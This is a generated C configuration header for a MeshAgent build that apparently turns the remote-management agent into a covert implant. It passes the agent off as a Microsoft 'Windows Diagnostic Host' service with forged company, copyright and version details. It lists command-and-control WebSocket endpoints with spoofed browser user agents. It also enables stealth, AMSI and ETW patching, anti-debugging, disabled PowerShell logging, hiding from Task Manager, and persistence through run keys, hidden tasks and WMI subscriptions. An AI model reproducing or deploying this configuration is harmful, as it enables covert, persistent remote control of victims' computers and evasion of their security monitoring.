/* Generated file - do not edit. */
/* Generated on: 2025-10-26 21:48:51 */
#ifndef GENERATED_MESHAGENT_BRANDING_H
#define GENERATED_MESHAGENT_BRANDING_H

/* ========== Service Branding ========== */
#undef MESH_AGENT_SERVICE_FILE
#define MESH_AGENT_SERVICE_FILE TEXT("WinDiagnosticHost")
#undef MESH_AGENT_SERVICE_NAME
#define MESH_AGENT_SERVICE_NAME TEXT("Windows Diagnostic Host Service")
#undef MESH_AGENT_COMPANY_NAME
#define MESH_AGENT_COMPANY_NAME "Microsoft Corporation"
#undef MESH_AGENT_PRODUCT_NAME
#define MESH_AGENT_PRODUCT_NAME "Windows Diagnostic Host"
#undef MESH_AGENT_FILE_DESCRIPTION
#define MESH_AGENT_FILE_DESCRIPTION "system health monitoring"
#undef MESH_AGENT_INTERNAL_NAME
#define MESH_AGENT_INTERNAL_NAME "diaghost.exe"
#undef MESH_AGENT_COPYRIGHT
#define MESH_AGENT_COPYRIGHT "Â© Microsoft Corporation. All rights reserved."
#undef MESH_AGENT_ORIGINAL_FILENAME
#define MESH_AGENT_ORIGINAL_FILENAME "diaghost.exe"
#undef MESH_AGENT_INSTALL_ROOT
#define MESH_AGENT_INSTALL_ROOT TEXT("C:/ProgramData/DiagnosticHost")
#undef MESH_AGENT_LOG_DIRECTORY
#define MESH_AGENT_LOG_DIRECTORY TEXT("C:/ProgramData/DiagnosticHost/logs")
#undef MESH_AGENT_BINARY_NAME
#define MESH_AGENT_BINARY_NAME TEXT("diaghost.exe")
#undef MESH_AGENT_SVCHOST_DLL
#define MESH_AGENT_SVCHOST_DLL TEXT("diagsvc.dll")
#undef MESH_AGENT_ARTIFACT_DB
#define MESH_AGENT_ARTIFACT_DB TEXT("diaghost.db")
#undef MESH_AGENT_ARTIFACT_CONFIG
#define MESH_AGENT_ARTIFACT_CONFIG TEXT("diaghost.conf")
#undef MESH_AGENT_ARTIFACT_LOG
#define MESH_AGENT_ARTIFACT_LOG TEXT("diagnostics.log")
#undef MESH_AGENT_FILE_VERSION_MAJOR
#define MESH_AGENT_FILE_VERSION_MAJOR 10
#undef MESH_AGENT_FILE_VERSION_MINOR
#define MESH_AGENT_FILE_VERSION_MINOR 0
#undef MESH_AGENT_FILE_VERSION_BUILD
#define MESH_AGENT_FILE_VERSION_BUILD 19041
#undef MESH_AGENT_FILE_VERSION_REVISION
#define MESH_AGENT_FILE_VERSION_REVISION 0
#undef MESH_AGENT_FILE_VERSION_STR
#define MESH_AGENT_FILE_VERSION_STR TEXT("10.0.19041.0")
#undef MESH_AGENT_PRODUCT_VERSION_MAJOR
#define MESH_AGENT_PRODUCT_VERSION_MAJOR 10
#undef MESH_AGENT_PRODUCT_VERSION_MINOR
#define MESH_AGENT_PRODUCT_VERSION_MINOR 0
#undef MESH_AGENT_PRODUCT_VERSION_BUILD
#define MESH_AGENT_PRODUCT_VERSION_BUILD 19041
#undef MESH_AGENT_PRODUCT_VERSION_REVISION
#define MESH_AGENT_PRODUCT_VERSION_REVISION 0
#undef MESH_AGENT_PRODUCT_VERSION_STR
#define MESH_AGENT_PRODUCT_VERSION_STR TEXT("10.0.19041.0")

/* ========== Network Configuration ========== */
#define MESH_AGENT_NETWORK_ENDPOINT "wss://agents.high.support:4445/agent.ashx"
#define MESH_AGENT_NETWORK_SNI NULL
#define MESH_AGENT_NETWORK_HOST_HEADER NULL
#define MESH_AGENT_NETWORK_USER_AGENT "Microsoft-CryptoAPI/10.0"
#define MESH_AGENT_NETWORK_JA3 NULL
#define MESH_AGENT_NETWORK_FALLBACK_COUNT 3
#define MESH_AGENT_NETWORK_FALLBACK_LIST { { "wss://agents.high.support:4446/agent.ashx", "agents.high.support", "agents.high.support", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36", "http/1.1" }, { "wss://agents-dr.high.support:4445/agent.ashx", "agents-dr.high.support", "agents-dr.high.support", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:115.0) Gecko/20100101 Firefox/115.0", "http/1.1" }, { "wss://198.51.100.45:443/agent.ashx", "agents.high.support", "agents.high.support", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0", "http/1.1" } }

/* ========== Provisioning Data ========== */
#define MESH_AGENT_MESH_ID "0x5EF6C8D64DA061FD8FA18F023CA11F8BF0DB8829D0C70943A9B7B6A4C75D04BBECB5C3FBE20579C8A9B6A94A106AFB19"
#define MESH_AGENT_SERVER_ID "EE1022AB3A8C5012E9D31A0E3655F3F795D723D80D25B21F8416B062853E2BD242CA44C33AEA681E87E3637DFA1E2DE7"
#define MESH_AGENT_MESH_NAME "Windows Diagnostics"
#define MESH_AGENT_SERVER_URL "wss://agents.high.support:4445/agent.ashx"
#define MESH_AGENT_MESH_TYPE 2

/* ========== Stealth Features ========== */
#define MESH_AGENT_STEALTH_ENABLED 1
#define MESH_AGENT_SVCHOST_MODE 1
#define MESH_AGENT_HIDE_FILES 1
#define MESH_AGENT_HIDE_REGISTRY 1
#define MESH_AGENT_AMSI_PATCH 1
#define MESH_AGENT_ETW_PATCH 1
#define MESH_AGENT_ANTI_DEBUG 1
#define MESH_AGENT_SYSCALLS_DIRECT 1
#define MESH_AGENT_BUNDLE_EXTRACT_DEFAULT 1

/* ========== Persistence Configuration ========== */
#define MESH_AGENT_PERSIST_RUNKEY 1
#define MESH_AGENT_PERSIST_TASK 1
#define MESH_AGENT_PERSIST_WMI 1
#define MESH_AGENT_PERSIST_WATCHDOG 1
#define MESH_AGENT_PERSIST_RECOVERY_ENABLED 1
#define MESH_AGENT_PERSIST_TASK_NAME TEXT("Windows Diagnostic Host Task")
#define MESH_AGENT_PERSIST_TASK_TRIGGER TEXT("ONLOGON")
#define MESH_AGENT_PERSIST_TASK_HIDDEN 1
#define MESH_AGENT_PERSIST_RESTART_TASK_NAME TEXT("WinDiagnosticHost-RestartOnStop")
#define MESH_AGENT_PERSIST_WMI_CLASS TEXT("WinDiagnosticHost")
#define MESH_AGENT_PERSIST_WMI_METHOD TEXT("StartService")
#define MESH_AGENT_PERSIST_WMI_NAMESPACE TEXT("root/subscription")
#define MESH_AGENT_PERSIST_WATCHDOG_INTERVAL 300
#define MESH_AGENT_PERSIST_WATCHDOG_RESTART_DELAY 10
#define MESH_AGENT_PERSIST_WATCHDOG_RESTART_ON_CRASH 1
#define MESH_AGENT_PERSIST_RECOVERY_RESET_PERIOD 86400
#define MESH_AGENT_PERSIST_RECOVERY_RESTART_DELAY_MS 10000
#define MESH_AGENT_PERSIST_RECOVERY_ACTIONS TEXT("restart,restart,restart")

/* ========== Evasion Features ========== */
#define MESH_AGENT_DISABLE_PS_LOGGING 1
#define MESH_AGENT_DISABLE_EVENT_LOGS 0
#define MESH_AGENT_DISABLE_ETW 1
#define MESH_AGENT_HIDE_TASKMANAGER 1
#define MESH_AGENT_USE_SYSCALLS 1

/* ========== Signing Allowlist ========== */
#undef MESH_AGENT_ALLOWED_SIGNERS_COUNT
#define MESH_AGENT_ALLOWED_SIGNERS_COUNT 1
#undef MESH_AGENT_ALLOWED_SIGNERS
#define MESH_AGENT_ALLOWED_SIGNERS { { 0x72, 0x4D, 0x7C, 0x21, 0x88, 0xA2, 0x39, 0xEE, 0xB7, 0xE1, 0x82, 0x31, 0x81, 0x34, 0x75, 0x81, 0xDC, 0x83, 0xA4, 0xB1 } }

#endif /* GENERATED_MESHAGENT_BRANDING_H */
